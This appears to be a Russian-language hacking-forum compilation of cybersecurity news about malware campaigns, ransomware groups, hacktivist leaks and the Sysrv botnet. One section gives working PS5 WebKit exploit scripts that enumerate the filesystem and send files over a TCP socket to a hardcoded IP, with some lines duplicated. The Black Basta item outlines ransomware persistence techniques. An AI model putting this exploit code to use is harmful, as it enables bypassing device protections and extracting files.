Органы кибербезопасности пяти стран дали рекомендации по защите компаниям и их клиентам
image



Члены разведывательного альянса Five Eyes (FVEY) предупредили поставщиков управляемых услуг (Managed Service Provider, MSP) и их клиентов об увеличивающихся кибератаках на цепочки поставок.

Многочисленные службы кибербезопасности и правоохранительные органы из пяти стран альянса Five Eyes (Австралия, Канада, Новая Зеландия, Великобритания и США) для MSP по защите сетей и конфиденциальных данных от растущих киберугроз.

«Органы кибербезопасности Великобритании, Австралии, Канады, Новой Зеландии и США ожидают, что злоумышленники, включая спонсируемые государством группы постоянной серьезной угрозы (Advanced Persistent Threat, APT), активизируют свои атаки на MSP и попытаются использовать доверительные отношения между поставщиками и клиентами», - сказано в отчете.

«Например, субъект угроз, успешно скомпрометирующий MSP, может обеспечить последующую деятельность программы-вымогателя и кибершпионаж против MSP и всей клиентской базы», - добавлено в документе.

За последние несколько лет органы по кибербезопасности альянса FVEY выпустили другие документы ( , , , ) с общими рекомендациями для MSP и их клиентов. Недавние рекомендации включают конкретные меры по защите конфиденциальной информации с помощью переоценки обеспечения безопасности и договорных обязательств с учетом понимания клиентами возможного риска.

Документ содержит наиболее важные меры для обеспечения безопасности данных провайдера и клиента:
  • Идентифицировать и отключить недействительные учетные записи;
  • Применить многофакторную аутентификацию (Multi-factor authentication, MFA) к учетным записям MSP, которые получают доступ к клиентской среде, и мониторить на предмет сбоя аутентификации;
  • Обеспечить прозрачное определение в контрактах MSP роль и обязанности клиента в области безопасности информации и данных.



    • «MSP, уязвимые для эксплуатации, значительно увеличивают риски для бизнеса и организаций, которых они поддерживают. Обеспечение безопасности MSP имеет решающее значение для нашей коллективной киберзащиты и CISA. Межведомственные и международные партнеры привержены укреплению своей безопасности и повышению устойчивости нашей глобальной цепочки поставок», - сказала директор CISA Джен Истерли.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Мошенники выложили на YouTube видеоролики, якобы предлагающие бесплатных ботов для поиска мистери-боксов.
image


Специалисты из Netskope обнаружили новую вредоносную кампанию по распространению известного инфостилера RedLine с помощью поддельных ботов для покупки мистери-боксов Binance.

Мистери-боксы от криптовалютной биржи Binance представляют собой своего рода подарок в коробке, содержащей случайный NFT. Пользователь может купить такую «коробку» на тематических торговых площадках, не зная, что внутри, и в любой момент открыть ее или выставить на продажу. Какой NFT попадется пользователю, неизвестно. Это может быть как обычный токен, так и очень редкий, стоящий миллионы долларов. Однако чаще всего пользователям попадаются обычные.

Мистери-боксы пользуются огромной популярностью, однако маркетплейсы наподобие Binance предлагают их в ограниченном количестве, поэтому для «охоты» за ними заинтересованные покупатели часто используют ботов.

По словам специалистов из Netskope, злоумышленники выложили на YouTube видеоролики, якобы предлагающие бесплатных ботов для поиска мистери-боксов. В них содержится ссылка на GitHub-репозиторий, с которого предположительно можно скачать бота, но на самом деле вместо него обманутые пользователи загружают на свои компьютеры вредоносное ПО RedLine.

Имя загружаемого файла – BinanceNFT.bot_v1.3.zip. В нем содержится исполняемый файл с таким же именем, который является полезной нагрузкой, установщик на Visual C++ и файл README.txt. Для запуска RedLine требуется установщик VC, поскольку программа написана на .NET. В текстовом файле содержится инструкция по установке для жертв.

RedLine является популярным и весьма мощным вредоносным ПО для кражи данных (паролей, файлов cookie, чатов, учетных данных VPN и криптовалютных кошельков), распространяемым множеством хакеров самыми разными способами.

В данной вредоносной кампании RedLine не выполняется на компьютерах в России, Беларуси, Украине, Молдове, Армении, Азербайджане, Казахстане, Узбекистане, Таджикистане и Киргизии.

Компания Secureworks приписывает эти атаки CobaltMirage.
image


Иранская группа разработчиков шифровальщиков была связана с рядом вымогательских атак, направленных на организации в Израиле, США, Европе и Австралии. Secureworks приписывает эти атаки Cobalt Mirage, связанной с иранской группировкой Cobalt Illusion (она же APT35 , Charming Kitten , Newscaster или Phosphorus ).

"Атаки Cobalt Mirage ранее использовались группировками Phosphorus и TunnelVision", – в отчете группы противодействия угрозам Secureworks (CTU), предоставленном изданию The Hacker News.

По словам специалистов, Cobalt Mirage создала два совершенно разных набора атак для вторжения в системы. Первый набор атак содержит в себе вымогательское ПО и легитимные инструменты – BitLocker и DiskCryptor, а его основной целью является получение выкупа. Второй набор атак используется для похищения конфиденциальных данных ряда израильских, американских, европейских и австралийских организаций.

Первоначальный доступ облегчило сканирование серверов с доступом в интернет. Они использовались как канал для бокового движения и активации вымогательского ПО внутри систем устройств Fortinet и серверов Microsoft Exchange. Средства запуска полного шифрования остаются неизвестными – об этом сообщили Secureworks в описании январской атаки 2022 года на благотворительную организацию из США.

Во время еще одной атаки, направленной на сеть местных органов самоуправления США в середине марта 2022 года, предположительно использовались уязвимости Log4Shell в инфраструктуре VMware Horizon для проведения разведки и сканирования сети.

"Январский и мартовский инциденты демонстрируют различные стили атак, проводимых Cobalt Mirage", – заключили исследователи. "Хотя хакеры, по-видимому, добились значительных успехов в получении первоначального доступа к широкому кругу целей, их способность использовать этот доступ для получения финансовой выгоды или сбора разведданных представляется ограниченной".

Мы писали про эксплуатацию иранскими хакерами уязвимости Log4Shell в серверах VMware Horizon. Группировка TunnelVision эксплуатирует уязвимость для запуска PowerShell-команд, установки бэкдоров, хищения учетных данных и пр.

Злоумышленники за 2 года произвели около 1000 атак на на цели в странах Азии.
image


За последние два года группа опытных хакеров, известная как SideWinder, совершила серию из 1000 нападений, применяя все более изощренные методы кибератак. На конференции Black Hat Asia, Нушин Шаба, одна из исследователей международной группы "Лаборатории Касперского" рассказала о целях SideWinder – военных и правоохранительных органах Пакистана, Бангладеш и других стран Южной Азии. Ранее группировку связывали с индийскими хакерами, но Шаба сказала, что не уверена в привязке группы к какой-либо стране.

Однако исследовательница заявила о статусе SideWinder как одной из самых результативных группировок планеты. Неизвестно, почему банда резко стала действовать намного активнее, но Шаба считает, что ресурсы SideWinder по неизвестным причинам могли значительно увеличиться, о чем говорит не только расширение масштабов деятельности группировки, но и усложнение ПО, используемого злоумышленниками. Также исследовательница рассказала о новых методах маскировки вредоносных Javascript-файлов, которые SideWinder прячет в файлах .RTF, .LNK и документах Open Office. Лаборатория Касперского обнаружила уникальные ключи шифрования в более чем 1000 образцов вредоносных программ этой группировки.

SideWinder использует четырехэтапный процесс атаки на цели, причем упомянутые выше JavaScript-файлы обычно являются первым этапом, когда с их помощью развертываются скрипты, которые связываются с сетью серверов, расположенных в более чем 400 доменах. Группа использует эту сеть для установки бэкдоров и эксфильтрации данных.

К счастью, защититься от атак группировки довольно просто – достаточно регулярно устанавливать обновления ПО, поскольку основной целью SideWinder являются уязвимые программы для повышения производительности устройств.

Напомним, ранее мы писали как хакеры SideWinder наживались во время операции на территории Украины, развернув свою кампанию целенаправленного фишинга.

Обнаружен простой конструктор вредоносного ПО для кражи и отправки учетных данных на вебхуки Discord.
image



23 апреля 2022 года пользователь Discord под ником Portu начал рекламировать новый конструктор вредоносных программ для кражи паролей. Спустя четыре дня специалисты из компании Uptycs обнаружили первый образец вредоносного ПО, созданного в конструкторе Portu, который исследователи назвали KurayStealer. По данным экспертов, вредоносная программа использовалась для атак на пользователей Discord. Специалисты отметили, что автор KurayStealer вдохновлялся кодом других конструкторов вредоносного ПО, не стесняясь брать разные компоненты программ для кражи паролей из открытых источников по типу GitHub.

Принцип работы вредоноса прост: При первом запуске KurayStealer выполняет проверку, чтобы определить, использует ли злоумышленник бесплатную или "VIP" (платную) версию. Затем стилер пытается заменить строку "api/webhooks" на "Kisses" в BetterDiscord – расширенной версии приложения Discord, обладающей большей функциональностью для разработчиков. Если это действие будет успешным, хакер сможет нарушить защиту приложения и настроить вебхуки.

Вебхук – это механизм, с помощью которого веб-страницы и приложения могут передавать друг другу данные в режиме реального времени по протоколу HTTP. Они похожи на API, с той лишь разницей, что вебхуки отправляют информацию автоматически, без необходимости запроса со стороны получателя.

После настройки вебхуков вредоносная программа делает снимок экрана и определяет географическое положение устройства жертвы. Затем она начинает поиск учетных данных: запрашивает пароли, токены, IP-адреса и многое другое из Discord, Microsoft Edge, Chrome и 18 других приложений. Все данные, собранные в ходе этого процесса, возвращаются к злоумышленнику через вебхуки. Исследовав KurayStealer, специалисты заявили о волне вредоносных программ, использующих токены Discord в качестве C&C для сбора учетных данных жертв. Эксперты рекомендуют установить жесткий контроль и многоуровневые решения по обеспечению безопасности для предотвращения таких атак.

Ранее мы писали про похищение токенов Discord вредоносными JavaScript-библиотеками.Злоумышленники используют похищенные токены Discord для получения несанкционированного доступа к учетным записям без необходимости использовать пароль. Через взломанные таким образом учетные записи они распространяют вредоносные ссылки.

Набор вредоносных программ от Eternity предлагает хакерам инструменты для кражи данных и майнинга, а также компьютерных червей и вымогательское ПО.


Злоумышленники запустили Project Eternity, предоставляя вредоносное ПО как услугу (MaaS). Проект позволяет хакерам приобрести набор гибко настраиваемых инструментов с модулями для различных типов атак. Модули могут включать в себя инфостилер, программу для майнинга, клиппер, программу для распространения червей, а вскоре должен появиться и DDoS-бот. Каждый модуль приобретается отдельно.

634abb50bf24d796208bae8cf4554299.png


Сайт Project Eternity.

Проект продвигается на специальном Telegram-канале, насчитывающем более 500 участников, где разработчики публикуют заметки об обновлениях, инструкции по использованию и обсуждают с аудиторией добавление новых функций. Пользователи, которые купили комплект вредоносного ПО, могут использовать Telegram-бота для автоматической сборки бинарного файла после выбора и оплаты криптовалютой нужных функций.

d3c6023c8932c4580a36c77b3487b506.png


Покупка нужных модулей в Telegram-боте.

Список инструментов состоит из следующих позиций:

  • Инфостилер – продается за $260/год. Инструмент похищает пароли, данные кредитных карт, закладок, токенов, cookie-файлов и данные автозаполнения, хранящиеся в более чем двадцати веб-браузерах. Кроме того, он может похищать информацию из криптовалютных расширений и холодных кошельков, а также нацелен на десять менеджеров паролей, VPN-клиентов, мессенджеров и игровых клиентов.
  • Майнер – продается за $90/год. Инструмент может скрывать себя в диспетчере задач, автоматически перезапускаться при остановке процесса и самостоятельно включаться при запуске системы.
  • Клиппер – продается за $110. Это утилита, которая отслеживает адреса криптокошельков пользователя в буфере обмена и заменяет их на адреса кошельков злоумышленника.
  • Червь от Eternity – продается за $390. Этот червь может самостоятельно распространяться через USB-драйверы, общие ресурсы локальной сети, локальные файлы, облачные диски, проекты Python, аккаунты Discord и Telegram.

d3c6023c8932c4580a36c77b3487b506.png


Пример вредоносного ПО, распространяемого через учетную запись Discord.

Но самый дорогой инструмент – это программа-вымогатель от Eternity за 490 долларов. Она поддерживает автономное шифрование с использованием комбинаций AES/RSA и нацелена на документы, фотографии и базы данных. Разработчики называют свое вымогательское ПО полностью необнаруживаемым, пытаясь подтвердить это результатами проверки VirusTotal, где вредонос якобы показал ноль обнаружений. Модуль программы-вымогателя предлагает возможность установить таймер, по истечении которого файлы жертвы становится невозможно восстановить. Это сделано для оказания дополнительного давления на жертву, чтобы заставить ее быстро заплатить выкуп.

791f83e38bf40b5763c40fa36c9c5b0c.png


Таймер, угрожающий удалением файлов.

Аналитики из Cyble, обнаружившие Eternity Project, даже до полного изучения всех модулей сообщили , что видели используемые в природе образцы вредоносов Eternity. Изучая инфостилер, аналитики Cyble обнаружили несколько сходств с Jester Stealer. По их мнению, оба вредоноса были списаны с проекта DynamicStealer, расположенного на GitHub. Поэтому стилер от Eternity можно назвать модифицированной копией DynamicStealer , для которой злоумышленники провели ребрендинг с целью получения прибыли.

Но даже если все вредоносное ПО написано дилетантами, дополнительные модули, поддержка клиентов, автоматическая сборка и подробные инструкции по использованию вредоносных программ делают Project Eternity мощным оружием в руках неумелых хакеров и серьезной угрозой для обычных пользователей.

Злоумышленники из Black Basta крайне активны с апреля 2022 года.
image



Black Basta – новая группировка вымогателей, которая успела взломать около десятка компаний по всему миру с апреля 2022 года. В список жертв успели войти Американская стоматологическая ассоциация и крупная немецкая компания по производству ветряных турбин Deutsche Windtechnik. Исследователи MalwareHunterTeam уже успели связать Black Basta с группировкой Conti, подкрепляя свое предположение сходствами сайтов утечек данных и оплаты "услуг", а также похожей манерой общения и поведения операторов шифровальщиков.

Хотя атаки Black Basta относительно новые, специалисты уже обнародовали некоторые методы работы злоумышленников. Шифровальщик данных Black Basta требует привилегии администратора для запуска, в противном случае он безвреден. Поэтому для запуска вредоносного ПО группировка выбирает целью атаки легитимные службы Windows. Запустившись, вредонос стирает теневые копии с зараженной системы с помощью vssadmin.exe. Это действие удаляет резервную копию Windows, из-за чего после шифрования данных жертва не сможет вернуть систему в прежнее состояние Затем Black Basta загружает два файла: dlaksjdoiwq.jpg и fkdjsadasd.ico в папку Temp. Второй файл - это пользовательская иконка для всех файлов с расширением ".basta". Иконка назначается путем создания и установки нового ключа реестра "HKEY_CLASSES_ROOT\.basta\DefaultIcon".

Чтобы закрепиться в системе, Black Basta присваивает себе имя существующей службы, удаляет ее, после чего создает новую службу под названием FAX. Перед началом процедуры шифрования программа проверяет параметры загрузки с помощью API GetSystemMetrics(), а затем добавляет в реестр запись HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Fax для запуска службы FAX в безопасном режиме. После завершения всех настроек программа-вымогатель с помощью bcedit.exechecks настраивает ОС для запуска в безопасном режиме. В результате изменения режима загрузки компьютер перезагрузится в безопасном режиме с запущенной FAX, которая снова запустит вредоноса, но уже для шифрования данных жертвы.

Чтобы предотвратить дальнейшее шифрование, шифровальщик необходимо удалить из ОС. К сожалению, удаление не позволит вернуть уже скомпрометированные данные. Единственным решением остается восстановление из резервной копии, если она была создана до атаки и хранилась не на взломанном устройстве. Кроме того, чтобы избежать необратимой потери данных, специалисты рекомендуют хранить резервные копии в разных местах, например, на удаленных серверах, отключенных от сети устройствах хранения и т.д.

Мы писали про громкий дебют Black Basta, всего за несколько недель хакеры атаковали как минимум 12 компаний.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Утечка данных крупных российских компаний, взлом Rutube и обвинения ЕС в кибератаке на Украину.
image


В этом материале представлены наиболее значимые события кибербезопасности, связанные с военным конфликтом России и Украины.

14 мая Украинская IT-армия рассказала о взломе Rutube

14 мая IT-армия Украины опубликовала видео о самой большой победе кибевойны - взломе российского видеохостинга Rutube.

14 мая – Российские хакеры планировали сорвать Евровидение

Пророссийское волонтерское движение ЛЕГИОН призывало к DDoS-атакам на финал конкурса песни «Евровидение».

14 мая — Операция Oprussia против российских компаний продолжается

Прошла еще неделя, и Anonymous взломали несколько российский компаний и слили их данные через DDoSecrets.

14 мая — Пророссийские хакеры нацелились на итальянские институциональные сайты

Пророссийская хакерская группа Killnet атаковала веб-сайты нескольких итальянских учреждений, включая сенат и Национальный институт здравоохранения.

11 мая — США и Европа официально обвиняют Россию в атаках на Украину с очисткой данных

Европейский Союз осуждает кибератаки, совершенные российскими организациями против Украины, которые были нацелены на спутниковую сеть KA-SAT.

9 мая — Хактивисты взломали расписание программ во время Дня Победы и показали антивоенные сообщения .

9 мая в программе передач нескольких федеральных ТВ-каналов появились экстремистские надписи

9 мая — Украинская CERT предупреждает о новой волне атак, распространяющих вредоносное ПО Jester Stealer

Группа реагирования на компьютерные чрезвычайные ситуации Украины (CERT-UA) предупредила об атаках, распространяющих вредоносное ПО для кражи информации Jester Stealer.

В качестве организаторов атаки идентифицирована хакерская группа Killnet и ее филиал «Легион».
image


Специалисты почтовой полиции – спецподразделения МВД по борьбе с киберпреступлениями - в сотрудничестве с организаторами "Евровидения" и техническими службами гостелерадиокорпорации Rai устранили "различные компьютерные атаки DDOS-характера, направленные на сетевые инфраструктуры во время проведения голосования и выступлений артистов", говорится в сообщении.

По заявлению итальянской полиции, хакеры группировки Killnet, которую называют пророссийской, попытались проникнуть в системы конкурса во время его открытия и в ходе финального вечера, итоги которого были подведены в ночь на воскресенье.
В телеграмм-канале, координирующем группу «Легион», вечером в субботу, еще до начала голосования, действительно осуществлялась координация DDOS-атаки на сервер песенного конкурса «Евровидения». Однако эта атака длилась всего 13 минут, после чего координаторы дали указание прекратить атаку без объяснений.
Впоследствии организаторы были вынуждены убеждать участников группы о том, что кибернападение действительно нужно остановить и призвали «отнестись к просьбе с пониманием».
Реакция российской стороны на эту информацию не приводится. Власти России всегда категорически отвергают обвинения в связях с хакерскими группировками и причастности к атакам на различные структуры, в том числе, в странах Европейского Союза.
В этом году Россию лишили возможности участвовать в "Евровидении". Победу в 66-м песенном конкурсе, проходившем в Турине, одержала Украина. От неё выступила группа "Kalush Orchestra". Это третья победа Украины в конкурсе. Участники из Украины побеждали в 2004 и 2016 годах.

Сотрудник неоднократно сообщал своему начальству о проблемах с безопасностью, но его предупреждения были проигнорированы.
image



Бывший сотрудник крупной риэлтерской компании Lianjia Хань Бин получил 7 лет тюрьмы за авторизацию в корпоративных системах и удаление данных.

В июне 2018 года Бин, работавший в компании администратором баз данных, воспользовался своим служебным положением и наличием прав суперпользователя и получил доступ к финансовой системе Lianjia и удалил все данные, хранившиеся на двух серверах баз данных и двух серверах приложений.

В результате действий Бина большая часть операций компании незамедлительно «зависла», и десятки тысяч сотрудников на долгое время остались без зарплаты. На восстановление данных у Lianjia ушло около $30 тыс.

Непрямой ущерб от срыва бизнес-операций компании был намного больше, поскольку Lianjia насчитывает тысячи офисов, в которых работает более 120 тыс. брокеров. Ей также принадлежит 51 дочерняя компания, а ее рыночная стоимость составляет $6 млрд.

Бин сразу же стал подозреваемым, поскольку отказался предоставить следствию пароль от своего ноутбука. По совам следователей, они знали, что подобное преступление не оставляет следов на ноутбуке, и просто хотели посмотреть реакцию подозреваемых, которых на тот момент было пятеро.

В конечном итоге техработники извлекли с серверов журналы доступа и отследили активность до внутренних IP- и MAC-адресов. Инспекторам даже удалось получить журналы подключения к Wi-Fi и временные метки. Однако самым главным доказательством вины Бина стали записи камер видеонаблюдения.

Интересно, что Бин неоднократно сообщал своему начальству о проблемах с безопасностью финансовой системы и даже отправил электронные письма другим администраторам. Однако предупреждения были проигнорированы, и руководство отдела так и не одобрило предложенный им проект по усилению безопасности.

Хакеры подтвердили, что целью атаки был срыв трансляции парада 9 мая.
image



14 мая IT-армия Украины опубликовала видео о самой большой победе кибевойны - взломе российского видеохостинга Rutube.

Напомним, что Rutube подвергся атаке рано утром 9 мая и не работал в течение двух дней.

«На самом деле хорошо спланированную и дорогостоящую атаку, как мы видим из заявление RuTube, мы провели двумя специалистами и всего за несколько дней. Единственное, что они угадали - мы действительно хотели не допустить демонстрацию российского военного парада лжи и позора, на котором, прикрываясь именами наших дедов-героев, российская власть пропагандирует новую разрушительную войну и нацизм», – сказано в заявлении IT-армии.

Взломщики добавляют, что им удалось не только «удалить петабайты информации», но и «уничтожить всю инфраструктуру платформы, как внутреннюю, так и внешнюю»: удалить «контент-конвертер, все системы виртуализации, базы данных, системы поиска контента, рекламный модуль, системы распределения нагрузки и управления, системы документооборота». С компьютеров администраторов и сотрудников была стёрта «вся внутренняя информация».

Доказательства успешной атаки пообещали постепенно выложить в публичный доступ.

Sysrv полностью компрометирует сервера, используя эксплойты, которые позволяют удаленно выполнять вредоносный код.
image



Как сообщает Microsoft, ботнет Sysrv в настоящее время использует уязвимости в Spring Framework и WordPress для захвата и развертывания вредоносных программ для криптомайнинга на уязвимых Windows и Linux серверах.

Компания обнаружила новый обновленный вариант (отслеживаемый как Sysrv-K) с дополнительными возможностями, включая сканирование неисправленных WordPress и Spring.

«Новый вариант, который мы называем Sysrv-K, содержит дополнительные эксплоиты и может получить контроль над веб-серверами, используя различные уязвимости», сообщила команда Microsoft Security Intelligence в Twitter.

«Эти уязвимости включают старые уязвимости в плагинах WordPress, а также новые уязвимости, такие как CVE-2022-22947».

CVE-2022-22947 —уязвимость внедрения кода в библиотеке Spring Cloud Gateway, которая позволяет удаленно выполнить произвольный код на уязвимых серверах.

В рамках недавно добавленных возможностей Sysrv-K сканирует файлы конфигурации WordPress и их резервные копии на наличие учетных данных, которые позже используются для захвата веб-сервера.

Как и более старые варианты, Sysrv-K сканирует SSH-ключи, IP-адреса и имена хостов, а затем пытается подключиться к другим системам в сети через SSH для развертывания своих копий. В результате остальная часть сети может стать частью ботнета Sysrv-K.

— Microsoft Security Intelligence (@MsftSecIntel) 13 мая 2022 г.

Вредоносное ПО Sysrv, впервые обнаруженное исследователями безопасности Alibaba Cloud (Aliyun) в феврале, после активности с декабря 2020 года, также попало в поле зрения исследователей безопасности в Lacework Labs и Juniper Threat Labs после всплеска активности в марте.

По наблюдениям исследователей, Sysrv сканирует Интернет на наличие уязвимых корпоративных серверов Windows и Linux и заражает их майнерами Monero (XMRig) и самораспространяющимися вредоносными программами.

Чтобы взломать эти веб-серверы, ботнет использует уязвимости в веб-приложениях и базах данных, таких как PHPUnit, Apache Solar, Confluence, Laravel, JBoss, Jira, Sonatype, Oracle WebLogic и Apache Struts.

После уничтожения конкурирующих майнеров криптовалюты и развертывания собственных полезных нагрузок Sysrv также автоматически распространяется по сети с помощью атак грубой силы с использованием закрытых SSH ключей, собранных из разных мест на зараженных серверах (например, история bash, конфигурация ssh и файлы known_hosts).

Компонент распространения ботнета будет агрессивно сканировать Интернет в поисках более уязвимых систем Windows и Linux, чтобы добавить их в свою армию ботов для майнинга Monero.

Взломано более 1Tб переписок нескольких крупных российских компаний.
image



Напомним, что хакеры Anonymous используют хэштеги #Oprussia или #OpKremlin для объявления о действиях против российского сегмента интернета.

На этой неделе хактивисты взломали несколько организаций и государственных структур и разместили украденные данные через DDoSecrets. Ниже приведен список организаций, взломанных на этой неделе Anonymous:
  • SOCAR Energoresource управляет Антипинским НПЗ и несколькими нефтяными месторождениями. Компания работает напрямую с крупными российскими энергетическими и нефтяными компаниями, включая «Газпром», «Роснефть» и «Лукойл», и частично принадлежит Государственной нефтяной компании Азербайджанской Республики (SOCAR). Хактивиты опубликовали через DDoSecrets архив объемом 130 ГБ, который содержит почти 116 500 электронных писем.
  • Ачинская городская управа. Коллектив похитил более 7000 электронных писем у правительства Ачинска и слил архив размером 8,5 ГБ через DDoSecrets.
  • Полярный филиал Российского федерального научно-исследовательского института рыбного хозяйства и океанографии — российская организация, определяющая суммарный допустимый улов различных форм промысловой морской фауны. Хакеры слили 466 ГБ электронных писем организации. Источником утечки стал дуэт B00daMooda и @DepaixPorteur .
  • Служба портов и железнодорожных проектов ОАО «УГМК» управляет двумя крупнейшими портами России, специализирующимися на отгрузке угля. Эти порты максимально увеличили свой грузооборот за счет сотрудничества с ОАО «РЖД», которая доставляет уголь с месторождений в порты. Отгрузки угля из этих портов идут более чем в 30 стран, включая Южную Корею, Японию, Китай, Норвегию, Великобританию, Германию, Испанию, Италию, Словению, Финляндию, Бразилию, Израиль и Турцию. Anonymous разместил на DDoSecrets архив размером 106 ГБ, который содержит почти 77 500 электронных писем.

Пентагон излишне почивает на лаврах, не понимая огромного значения ИИ
image



США начинают серьезно отставать от Китая и России в области военного искусственного интеллекта, сообщает издание Foreign Affairs.

Авторы публикации отметили, что большинство новых разработок США заканчиваются неудачно. Но при этом Пентагон постоянно твердит о важности развития новых технологий, которые будут включать в себя автономные системы и искусственный интеллект. А у США с этим не все гладко.

В качестве примера приводятся прототипы беспилотных летательных аппаратов (БПЛА) X-45 и X-47A, которые способны вести разведку и наносить ракетные и бомбовые удары. Однако ВС США отказались от данных проектов.

«За последние несколько лет Китай инвестировал в исследования и разработки в области нейросети примерно столько же, сколько Вашингтон, но он гораздо более активно интегрирует эту технологию в свои военную стратегию»,рассказали аналитики журнала.
Издание указало на то, что российские ученые также разрабатывают военные технологии с искусственным интеллектом, которые могут угрожать вооруженным силам противника. США предрекли отставание от России и КНР в области искусственного интеллекта.
Ранее The National Interest сообщала, что США обеспокоились возможностью использования Россией и Китаем дронов и систем вооружения на основе искусственного интеллекта.

Для дампинга потребуется консоль PS5 только с версией прошивки 4.03, на других версиях способ не сработает.
image



Специализирующийся на взломе PlayStation хакер Bigboss опубликовал скрипты ROP (возвратно-ориентированного программирования) для перечисления и вывода данных из файловой системы PS5 с версией прошивки 4.03 с помощью webkit эксплоита. Конечно, получить весь дамп файлов не выйдет, а только файлы, доступные через разрешения webkit. Тем не менее, благодаря этому можно получить ясную картину файлов PS5.

Дампинг файловой системы PS5 с пошивкой 4.03. Инструкция

Наверное, это очевидно, но для дампинга потребуется консоль PS5 только с версией прошивки 4.03, на других версиях способ не сработает.

Необходимо будет модифицировать выполнение ROP в пользовательском пространстве. Эти файлы были выпущены ChendoChap и ZnullPtr некоторое время назад и доступны .

После строчки 650 скрипта exploit.js (alert(`sys_getpid: ${pid}`);), скорее всего, потребуется удалить раздел образцов (Threading Sample и Branch Sample) и заменить их представленным ниже кодом от Bigboss.

Далее нужно сохранить полученные файлы на сервере и загрузить index.html через браузер PS5 (например, можно воспользоваться одним из DNS от Al-Azif: 165.227.83.145 или 192.241.221.79, получить доступ к странице с руководством для пользователя на PS5, а затем воспользоваться URL-переадресатором).

Скрипт для перечисления файлов и папок (также дает имя строке sandbox, полупроизвольное имя папки под конкретного пользователя):
let directory=malloc(256,1);
p.writestr(directory.add32(0),"/");
let retopen=await chain.syscall(5,directory,0,0);
let directoryBuffer=malloc(1024*1024,1);
let directorySize=1024*1024;
let retgetdent=await chain.syscall(272,retopen,directoryBuffer,directorySize);
let numbytes=parseInt(retgetdent,16);
let entry;
let num_entry=0;
let d_fileno;
let d_reclen;
let d_type;
let d_namelen;
let d_name;
let position=0;
for(position=0;position<numbytes;){
entry=directoryBuffer.add32(position);
d_fileno=p.read4(entry.add32(0));
d_reclen=p.read2(entry.add32(4));
d_type=p.read1(entry.add32(6));
d_namelen=p.read1(entry.add32(7));
d_name=p.readstr(entry.add32(8));
alert("num_entry=${num_entry} d_reclen=${d_reclen} d_type=${d_type} d_namelen=${d_namelen} d_name=${d_name} position=${position}");
position=position+d_reclen;
parseInt(position)+parseInt(d_reclen,16);
num_entry++;
}

Скрипт для создания дампа файла в целевом файле на компьютере:
//POST EXPLOIT STUFF HERE
//change once per file name
//use for example in your pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:ScePlayReady.self,creat,trunc
let tcpsocket=await chain.syscall(97,2,1,0);
alert(`sys_socket: ${tcpsocket}`);
let tcpsocketaddr=malloc(16,1);
p.write1(tcpsocketaddr.add32(1),2);
p.write2(tcpsocketaddr.add32(2),0x1247);
//change ip for your pc
p.write4(tcpsocketaddr.add32(4),0xCD01A8C0); //192(C0)168(A8)1(01)205(CD)
alert(`before sys_connect`);
let ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16);
alert(`sys_connect: ${ret_tcpconnect}`);
//the right way is to use stat get size but this is quick and dirty test
let tcpmessage=malloc(34406400,1);
let tcpmessage_size=34406400;
let file=malloc(256,1);
p.writestr(file.add32(0),"/RcDZV3xbd4/common/lib/ScePlayReady.self");//example path /RcDZV3xbd4/common/lib/ScePlayReady.self, change RcDZV3xbd4 to your sandbox string
let retopen_file=await chain.syscall(5,file,0,0);
alert(`syscall_open return ${retopen_file}\n`);
let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size);
alert(`before sys_sendto read ${file_read}`);
let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`);
let ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
alert(`syscall_open return ${retopen_file}\n`);
let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size);
alert(`before sys_sendto read ${file_read}`);
let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0);
alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`);
let ret_close=await chain.syscall(6,tcpsocket);
alert(`sys_close: ${ret_close}`);
//size used was for a self file
//after all this your ScePlayReady.self file is created and closed

Конечно, энтузиасты, работающие над взломом PS5, уже наверняка получили файлы с помощью этого механизма (и, вероятно, смогли получить еще больше другими способами), но для тех, кто просто хочет посмотреть, как это делается, представленные выше скрипты являются самым простым способом.

Новая фишинговая кампания волной накрыла Украину.
image



Украинской группой быстрого реагирования на компьютерные инциденты (CERT-UA) получена информация о рассылке фишинговых электронных писем с темой "О проведении акции мести в Херсоне!", содержащих вложения в виде файла "План Херсон.htm". HTM-файл декодирует и создает на компьютере жертвы файл "Herson.rar", содержащий ярлык "План подхода и закладки взрывчатки на объектах критической инфростурктуры Херсона.lnk".



Если открыть LNK-файл, то он загрузит и запустит HTA-файл "precarious.xml", после чего будут созданы и исполнены файлы "desktop.txt" и "user.txt". На последнем этапе цепочки атаки загружается и исполняется вредонос GammaLoad.PS1_v2. Программа способна делать снимки экрана зараженного устройства и отправлять их на сервер злоумышленников.

Правительственные эксперты приписывают атаку группировке Armageddon APT (UAC-0010) (она же Gamaredon, Primitive Bear, Armageddon, Winterflounder или Iron Tilden), которая была вовлечена в длинную череду атак на украинские правительственные организации.

Напомним, ранее APT Armageddon атаковала украинские организации новым вариантом бэкдора Pteredo. Группировка проводит операции по кибершпионажу в отношении украинских правительственных организаций как минимум с 2014 года.
 
Последнее редактирование:
  • Теги
    cyber hack probiv
  • Назад
    Сверху Снизу